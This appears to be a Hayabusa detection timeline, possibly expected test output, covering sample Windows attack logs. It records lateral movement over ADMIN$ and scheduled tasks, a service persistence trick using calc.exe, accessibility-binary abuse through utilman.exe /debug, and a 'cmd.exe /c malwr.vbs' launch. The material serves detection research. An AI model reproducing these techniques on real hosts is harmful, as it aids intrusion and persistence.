+2019-03-19 09:02:07.523 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\CYAlyNSS.tmp | IP Addr: 10.0.2.17 | LID: 0x17e2c0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:16.835 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,info,,NTLM Logon To Local Account,User: Administrator | Computer: WIN-77LTAPHIQ1R | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:17.117 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,../hayabusa-rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:17.117 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,../hayabusa-rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:21.929 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ | Computer:  | IP Addr: fe80::79bf:8ee2:433c:2567 | LID: 0x18423d,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:41:29.008 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,info,Persis,Service Installed,Name: remotesvc | Path: calc.exe | Account: LocalSystem | Start Type: auto start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx
+2019-03-20 02:22:24.761 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x39e47fa | PID: 3824 | PGUID: 365ABB72-2550-5C91-0000-00108FE4CF05",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 02:22:24.851 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x39e47fa | PID: 3688 | PGUID: 365ABB72-2550-5C91-0000-00101EE6CF05,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 02:22:24.901 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x39e47fa | PID: 4088 | PGUID: 365ABB72-2550-5C91-0000-00106CEACF05",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 02:22:40.373 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x39e47fa | PID: 3092 | PGUID: 365ABB72-2560-5C91-0000-0010C721DA05,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 02:26:03.585 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x39e47fa | PID: 4004 | PGUID: 365ABB72-262B-5C91-0000-0010B2566006,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 02:26:05.628 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x39e47fa | PID: 2792 | PGUID: 365ABB72-262D-5C91-0000-00108EA26106,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 02:31:03.687 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x39e47fa | PID: 3264 | PGUID: 365ABB72-2757-5C91-0000-0010A2B52A07,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 02:36:03.788 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x39e47fa | PID: 2056 | PGUID: 365ABB72-2883-5C91-0000-00101656F407,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 02:41:03.890 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x39e47fa | PID: 1756 | PGUID: 365ABB72-29AF-5C91-0000-0010B895C008,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 02:41:08.777 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 1876 | PGUID: 365ABB72-29B4-5C91-0000-00108191C308",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 02:41:08.967 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.EXE /c malwr.vbs | Process: C:\Windows\System32\cmd.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x39e47fa | PID: 3748 | PGUID: 365ABB72-29B4-5C91-0000-0010289AC308,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 02:41:08.977 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Logoff | Process: C:\Windows\System32\gpscript.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x39e47fa | PID: 3488 | PGUID: 365ABB72-29B4-5C91-0000-0010999AC308,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 02:41:09.828 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x1 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 2384 | PGUID: 365ABB72-29B5-5C91-0000-0010BE04C408",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 02:42:05.859 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe C:\Windows\system32\CompatTelRunner.exe | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 4012 | PGUID: 365ABB72-29ED-5C91-0000-00107271E808,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:11.238 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 360 | PGUID: 365ABB72-528C-5C91-0000-00104B4B0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:11.458 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 368 | PGUID: 365ABB72-528C-5C91-0000-0010644D0000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:11.699 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 408 | PGUID: 365ABB72-528D-5C91-0000-00103B500000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:11.719 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: wininit.exe | Process: C:\Windows\System32\wininit.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 416 | PGUID: 365ABB72-528D-5C91-0000-001056500000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:11.759 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | LID: 0x3e7 | PID: 428 | PGUID: 365ABB72-528D-5C91-0000-00109C500000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:11.909 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\services.exe | Process: C:\Windows\System32\services.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 484 | PGUID: 365ABB72-528D-5C91-0000-001062560000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:11.909 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\lsass.exe | Process: C:\Windows\System32\lsass.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 500 | PGUID: 365ABB72-528D-5C91-0000-0010AD570000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:11.919 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\lsm.exe | Process: C:\Windows\System32\lsm.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 508 | PGUID: 365ABB72-528D-5C91-0000-0010DA570000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:11.929 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | LID: 0x3e7 | PID: 516 | PGUID: 365ABB72-528D-5C91-0000-00100C580000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:12.931 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 632 | PGUID: 365ABB72-528F-5C91-0000-001073780000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:13.151 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\VBoxService.exe | Process: C:\Windows\System32\VBoxService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 692 | PGUID: 365ABB72-528F-5C91-0000-0010ECB50000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:13.181 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 876 | PGUID: 365ABB72-528F-5C91-0000-00106BBE0000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:13.221 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1012 | PGUID: 365ABB72-5290-5C91-0000-001033D00000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:14.232 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1136 | PGUID: 365ABB72-5290-5C91-0000-00104C100100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:14.563 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\Tasks\SA.DAT | Process: C:\Windows\system32\svchost.exe | PID: 1036 | PGUID: 365ABB72-5290-5C91-0000-0010E6D10000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:14.603 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\spoolsv.exe | Process: C:\Windows\System32\spoolsv.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1416 | PGUID: 365ABB72-5292-5C91-0000-00101E310100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:14.933 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1532 | PGUID: 365ABB72-5292-5C91-0000-001036480100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:14.933 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.094 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Startup | Process: C:\Windows\System32\gpscript.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x3e7 | PID: 1616 | PGUID: 365ABB72-52A4-5C91-0000-0010A8560100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1628 | PGUID: 365ABB72-52B4-5C91-0000-0010355B0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1636 | PGUID: 365ABB72-52B4-5C91-0000-0010D55B0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.154 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1676 | PGUID: 365ABB72-52B4-5C91-0000-0010C25D0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.154 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\freeSSHd\FreeSSHDService.exe"" | Process: C:\Program Files\freeSSHd\FreeSSHDService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1788 | PGUID: 365ABB72-52CE-5C91-0000-00106F720100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1820 | PGUID: 365ABB72-52CE-5C91-0000-00109D740100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.454 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\Temp\wodCmdTerm.exe | Process: C:\Program Files\freeSSHd\FreeSSHDService.exe | PID: 1788 | PGUID: 365ABB72-52CE-5C91-0000-00106F720100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.514 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1948 | PGUID: 365ABB72-52EC-5C91-0000-001027860100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.514 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.795 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 304 | PGUID: 365ABB72-5310-5C91-0000-001096A90100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.795 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.835 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 432 | PGUID: 365ABB72-532B-5C91-0000-00100EB40100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.835 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.865 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe $(Arg0) | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 580 | PGUID: 365ABB72-5344-5C91-0000-001032BC0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.885 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1156 | PGUID: 365ABB72-5345-5C91-0000-001019C40100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.885 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.915 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1280 | PGUID: 365ABB72-5366-5C91-0000-00109FCD0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.915 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
